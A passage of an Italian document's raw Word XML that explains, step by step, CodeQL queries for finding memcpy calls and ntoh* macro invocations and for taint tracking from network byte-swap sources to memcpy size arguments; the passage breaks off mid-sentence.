                      <a:hlinkClick r:id="rId102"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1852930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DD553" w14:textId="77777777" w:rsidR="00297B8D" w:rsidRDefault="00297B8D" w:rsidP="001A5796">
      <w:r>
        <w:t>La query i</w:t>
      </w:r>
      <w:r w:rsidRPr="00297B8D">
        <w:t xml:space="preserve">ndividuerà tutte le occorrenze delle macro "ntohs", "ntohl" e "ntohll". Per ciascuna occorrenza trovata, verrà restituita la macro stessa insieme alla stringa di descrizione "a find macro of ntoh*". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C55B751" w14:textId="7FD17D72" w:rsidR="00297B8D" w:rsidRDefault="00297B8D" w:rsidP="00297B8D">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc140165798"/>
      <w:r>
        <w:t xml:space="preserve">4.4.4 </w:t>
      </w:r>
      <w:r w:rsidR="00D94032">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D94032" w:rsidRPr="00D94032">
        <w:t>rova tutte le chiamate a</w:t>
      </w:r>
      <w:r w:rsidR="00D94032">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94032" w:rsidRPr="00D94032">
        <w:t>memcpy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="28214098" w14:textId="77777777" w:rsidR="00D94032" w:rsidRDefault="00D94032" w:rsidP="00D94032">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo la query nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r w:rsidRPr="00D94032">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>6_memcpy_calls.ql</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CA7E1" w14:textId="398E6E10" w:rsidR="00D94032" w:rsidRDefault="003E26F9" w:rsidP="00D94032">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D49EC77" wp14:editId="0CF361AB">
            <wp:extent cx="5041900" cy="1075012"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1369010905" name="Immagine 4" descr="Immagine che contiene Software multimediale, software, schermata, Software per la grafica&#10;&#10;Descrizione generata automaticament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0905" name="Immagine 4" descr="Immagine che contiene Software multimediale, software, schermata, Software per la grafica&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId105"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId106"/>
                    <a:srcRect l="16343" t="3872" r="9349" b="62691"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5409557" cy="1153402"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF41E29" w14:textId="77777777" w:rsidR="0005110A" w:rsidRDefault="0005110A" w:rsidP="00D94032">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB18900" w14:textId="36CE5E7A" w:rsidR="0005110A" w:rsidRDefault="0005110A" w:rsidP="0005110A">
      <w:r>
        <w:t xml:space="preserve">Definisce due variabili: </w:t>
      </w:r>
      <w:r w:rsidRPr="0005110A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che rappresenta una chiamata di funzione nel codice sorgente, e </w:t>
      </w:r>
      <w:r w:rsidRPr="0005110A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fcn</w:t>
      </w:r>
      <w:r>
        <w:t>, che rappresenta una funzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E19C24" w14:textId="77777777" w:rsidR="0005110A" w:rsidRDefault="0005110A" w:rsidP="0005110A">
      <w:r>
        <w:t>Utilizza il predicato where per specificare due condizioni:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FF46E" w14:textId="77777777" w:rsidR="0005110A" w:rsidRDefault="0005110A" w:rsidP="0005110A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>call.getTarget() = fcn - La funzione di destinazione della chiamata deve essere uguale alla funzione fcn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA905A2" w14:textId="40C11A9E" w:rsidR="0005110A" w:rsidRDefault="0005110A" w:rsidP="0005110A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fcn.hasName("memcpy") - Il nome della funzione fcn deve essere "memcpy".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C682FEF" w14:textId="6A27F4D0" w:rsidR="00B50274" w:rsidRDefault="00B50274" w:rsidP="00392310">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc140165799"/>
      <w:r>
        <w:t xml:space="preserve">4.4.5 </w:t>
      </w:r>
      <w:r w:rsidR="00392310">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00392310" w:rsidRPr="00392310">
        <w:t xml:space="preserve">rova tutte le invocazioni </w:t>
      </w:r>
      <w:r w:rsidR="000965CE">
        <w:t xml:space="preserve">delle macro </w:t>
      </w:r>
      <w:r w:rsidR="00392310" w:rsidRPr="00392310">
        <w:t>ntoh*</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="0CF12CE1" w14:textId="6F0372B3" w:rsidR="00B50274" w:rsidRDefault="00AC739C" w:rsidP="0005110A">
      <w:r>
        <w:t>Creiamo la query nel file</w:t>
      </w:r>
      <w:r w:rsidR="008219F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r w:rsidR="008219F8" w:rsidRPr="00A4679F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>7_macro_invocations.ql</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008219F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA9419" w14:textId="77777777" w:rsidR="00E45E48" w:rsidRDefault="003E26F9" w:rsidP="00E45E48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09FDD3C4" wp14:editId="59EBA1D8">
            <wp:extent cx="6575708" cy="1214846"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="2011191626" name="Immagine 5" descr="Immagine che contiene software, Software multimediale, schermata, Software per la grafica&#10;&#10;Descrizione generata automaticament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91626" name="Immagine 5" descr="Immagine che contiene software, Software multimediale, schermata, Software per la grafica&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId108"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId109"/>
                    <a:srcRect l="6488" t="5200" r="1992" b="64978"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6627983" cy="1224504"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FB867" w14:textId="77777777" w:rsidR="008039D6" w:rsidRDefault="008039D6" w:rsidP="008039D6">
      <w:r>
        <w:t>Definisce due variabili: m, che rappresenta una macro nel codice sorgente, e mi, che rappresenta un'invocazione di macro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A020CB9" w14:textId="77777777" w:rsidR="008039D6" w:rsidRDefault="008039D6" w:rsidP="008039D6">
      <w:r>
        <w:t>Utilizza il predicato where per specificare due condizioni:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726408A" w14:textId="77777777" w:rsidR="00CB0604" w:rsidRDefault="008039D6" w:rsidP="00B81E0D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mi.getMacro() = m - La macro coinvolta nell'invocazione deve essere uguale alla macro m.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B788FBD" w14:textId="77777777" w:rsidR="00CB0604" w:rsidRDefault="008039D6" w:rsidP="002B1E93">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>(m.getName()="ntohs" or m.getName()="ntohl" or m.getName()="ntohll") - Il nome della macro m deve corrispondere a "ntohs", "ntohl" o "ntohll".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D7E83" w14:textId="54E5B5B4" w:rsidR="00E45E48" w:rsidRDefault="008039D6" w:rsidP="002B1E93">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilizza il predicato select per selezionare la variabile mi (l'invocazione di macro)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1EDFC" w14:textId="633339E8" w:rsidR="00405C9A" w:rsidRDefault="00405C9A" w:rsidP="00405C9A">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc140165800"/>
      <w:r>
        <w:t xml:space="preserve">4.4.6 </w:t>
      </w:r>
      <w:r w:rsidR="007329AE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007B1A0F" w:rsidRPr="007B1A0F">
        <w:t>rovare le espressioni di primo livello in cui si espandono queste invocazioni di macro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7A766165" w14:textId="0E79B789" w:rsidR="007329AE" w:rsidRDefault="007329AE" w:rsidP="007329AE">
      <w:r>
        <w:t xml:space="preserve">Creiamo la query nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidRPr="007329AE">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>8_macro_expressions.ql</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5510D20F" w14:textId="3AAF416F" w:rsidR="005678D9" w:rsidRDefault="003E26F9" w:rsidP="007329AE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A778444" wp14:editId="3FACB515">
            <wp:extent cx="6345464" cy="1031966"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1347556194" name="Immagine 6" descr="Immagine che contiene software, Software multimediale, testo, Software per la grafica&#10;&#10;Descrizione generata automaticament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6194" name="Immagine 6" descr="Immagine che contiene software, Software multimediale, testo, Software per la grafica&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId111"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId112"/>
                    <a:srcRect l="4520" b="69955"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6345464" cy="1031966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B90C7" w14:textId="77777777" w:rsidR="005678D9" w:rsidRDefault="005678D9" w:rsidP="005678D9">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Definisce due variabili: m, che rappresenta una macro nel codice sorgente, e mi, che rappresenta un'invocazione di macro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819841A" w14:textId="77777777" w:rsidR="00E62E2C" w:rsidRDefault="005678D9" w:rsidP="002E7F8E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizza il predicato where per specificare due condizioni: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DE9DB3" w14:textId="77777777" w:rsidR="00E62E2C" w:rsidRDefault="005678D9" w:rsidP="00E62E2C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r>
        <w:t>mi.getMacro() = m - La macro coinvolta nell'invocazione deve essere uguale alla macro m.</w:t>
      </w:r>
      <w:r w:rsidR="00E62E2C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3DAF2" w14:textId="77777777" w:rsidR="00E62E2C" w:rsidRDefault="005678D9" w:rsidP="00E62E2C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(m.getName()="ntohs" or m.getName()="ntohl" or m.getName()="ntohll") - Il nome della macro m deve corrispondere a "ntohs", "ntohl" o "ntohll".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F304692" w14:textId="29BBB9CE" w:rsidR="005678D9" w:rsidRDefault="005678D9" w:rsidP="00E62E2C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilizza il predicato select per selezionare mi.getExpr(), che rappresenta l'espressione associata all'invocazione di macro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E4F39" w14:textId="5ACC0F58" w:rsidR="005C3FD1" w:rsidRDefault="005C3FD1" w:rsidP="005C3FD1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc140165801"/>
      <w:r>
        <w:t xml:space="preserve">4.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="00027FDC" w:rsidRPr="00027FDC">
        <w:t>scriv</w:t>
      </w:r>
      <w:r w:rsidR="00D14078">
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidR="00027FDC" w:rsidRPr="00027FDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D14078">
        <w:t>una</w:t>
      </w:r>
      <w:r w:rsidR="00027FDC" w:rsidRPr="00027FDC">
        <w:t xml:space="preserve"> classe</w:t>
      </w:r>
      <w:r w:rsidR="00D14078">
        <w:t xml:space="preserve"> CodeQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0D11FBE7" w14:textId="720F24C9" w:rsidR="005C3FD1" w:rsidRDefault="005C3FD1" w:rsidP="005C3FD1">
      <w:r>
        <w:t xml:space="preserve">Creiamo la </w:t>
      </w:r>
      <w:r w:rsidR="00D14078">
        <w:t>classe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nel file </w:t>
      </w:r>
      <w:r w:rsidR="00D14078" w:rsidRPr="00D14078">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidR="00D14078" w:rsidRPr="00D14078">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>9_class_network_byteswap.ql</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42D0EA84" w14:textId="77777777" w:rsidR="005C3FD1" w:rsidRDefault="003E26F9" w:rsidP="00B369D0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A357181" wp14:editId="5FABC9C2">
            <wp:extent cx="3657600" cy="2940921"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1926607052" name="Immagine 7" descr="Immagine che contiene schermata, Software multimediale, testo, software&#10;&#10;Descrizione generata automaticament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7052" name="Immagine 7" descr="Immagine che contiene schermata, Software multimediale, testo, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId114"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId115"/>
                    <a:srcRect r="73049" b="59500"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3682203" cy="2960704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2091D959" w14:textId="77777777" w:rsidR="00E433B4" w:rsidRDefault="00E433B4" w:rsidP="007329AE"/>
    <w:p w14:paraId="79394B26" w14:textId="77777777" w:rsidR="00E433B4" w:rsidRDefault="00A06B6A" w:rsidP="007329AE">
      <w:r w:rsidRPr="00A06B6A">
        <w:t xml:space="preserve">La classe ha un costruttore vuoto e utilizza il predicato exists per verificare l'esistenza di un'invocazione di macro correlata alle macro "ntohs", "ntohl" e "ntohll". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CFD5C9" w14:textId="164BE913" w:rsidR="005C3FD1" w:rsidRDefault="00A06B6A" w:rsidP="007329AE">
      <w:r w:rsidRPr="00A06B6A">
        <w:t>In particolare, controlla se l'espressione corrente (this) corrisponde all'espressione di una chiamata di macro (mi.getExpr()) e se la macro associata a quella chiamata (mi.getMacro()) corrisponde a una delle macro specificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E3993" w14:textId="77777777" w:rsidR="00E433B4" w:rsidRDefault="00E433B4" w:rsidP="007329AE"/>
    <w:p w14:paraId="622B0016" w14:textId="4F9AA2EB" w:rsidR="00B369D0" w:rsidRDefault="00B369D0" w:rsidP="00B369D0">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc140165802"/>
      <w:r>
        <w:t xml:space="preserve">4.4.8 </w:t>
      </w:r>
      <w:r w:rsidR="00EB33EC">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00EB33EC" w:rsidRPr="00EB33EC">
        <w:t>nalisi del flusso di dati e tracciamento delle contaminazioni</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="05F67066" w14:textId="7DB1C5DD" w:rsidR="00B369D0" w:rsidRDefault="00B369D0" w:rsidP="007329AE">
      <w:r>
        <w:t xml:space="preserve">Creiamo </w:t>
      </w:r>
      <w:r w:rsidR="00E257B1">
        <w:t xml:space="preserve">il </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="00D14078">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r w:rsidR="00E257B1" w:rsidRPr="00E257B1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>10_taint_tracking_ql</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="582AA0EA" w14:textId="77777777" w:rsidR="00E45362" w:rsidRDefault="003E26F9" w:rsidP="007329AE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF2CA43" wp14:editId="5C67FD3A">
            <wp:extent cx="3411195" cy="3566160"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:docPr id="2013381650" name="Immagine 8" descr="Immagine che contiene Software multimediale, software, schermata, testo&#10;&#10;Descrizione generata automaticament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1650" name="Immagine 8" descr="Immagine che contiene Software multimediale, software, schermata, testo&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId117"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId118"/>
                    <a:srcRect r="66979"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3425788" cy="3581416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00360219">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057A9CBA" wp14:editId="08C88CB7">
            <wp:extent cx="3222976" cy="3559810"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1035624888" name="Immagine 9" descr="Immagine che contiene Software multimediale, softwar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4888" name="Immagine 9" descr="Immagine che contiene Software multimediale, software, schermata, testo&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId118"/>
                    <a:srcRect l="64093" r="822"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3256713" cy="3597073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB667A" w14:textId="4876FCE3" w:rsidR="006C17AB" w:rsidRDefault="006C17AB" w:rsidP="006C17AB">
      <w:r>
        <w:t xml:space="preserve">L'analisi delle informazioni di </w:t>
      </w:r>
      <w:r w:rsidR="00335D8B">
        <w:t>Taint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> è un processo che identifica come i dati provenienti da fonti non attendibili, come l'input dell'utente, si propagano a destinazioni potenzialmente pericolose, come funzioni che potrebbero causare problemi di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191D475" w14:textId="4609F5C1" w:rsidR="006C17AB" w:rsidRDefault="006C17AB" w:rsidP="006C17AB">
      <w:r>
        <w:t xml:space="preserve">Nel codice, viene definita una classe chiamata "NetworkByteSwap" che rappresenta un'operazione di inversione dei byte di rete. Questa classe viene considerata una possibile fonte di dati non attendibili nell'analisi delle informazioni di </w:t>
      </w:r>
      <w:r w:rsidR="002168EA">
        <w:t>Taint</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2810DC" w14:textId="052B44C2" w:rsidR="006C17AB" w:rsidRDefault="006C17AB" w:rsidP="006C17AB">
      <w:r>
        <w:t>Viene anche definita una classe chiamata "Config" che specifica le configurazioni per l'analisi delle informazioni di "taint". All'interno di questa classe, vengono fornite implementazioni per due predicati: "isSource" e "isSink".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2BED5" w14:textId="50C09D9E" w:rsidR="006C17AB" w:rsidRDefault="006C17AB" w:rsidP="006C17AB">
      <w:r>
        <w:t xml:space="preserve">Il predicato "isSource" verifica se un'istruzione di "NetworkByteSwap" può essere considerata una </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2674">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sorgente di dati non attendibili</w:t>
      </w:r>
      <w:r>
        <w:t>. In sostanza, controlla se l'operazione di inversione dei byte di rete potrebbe generare dati che non sono attendibili o provenienti da una fonte affidabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E96B2" w14:textId="42146F64" w:rsidR="006C17AB" w:rsidRDefault="006C17AB" w:rsidP="006C17AB">
      <w:r>
        <w:t xml:space="preserve">Il predicato "isSink" verifica se un'istruzione può essere considerata una destinazione di dati non attendibili. In particolare, controlla se l'istruzione rappresenta </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2674">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>l'argomento di dimensione di una chiamata alla funzione "memcpy"</w:t>
      </w:r>
      <w:r>
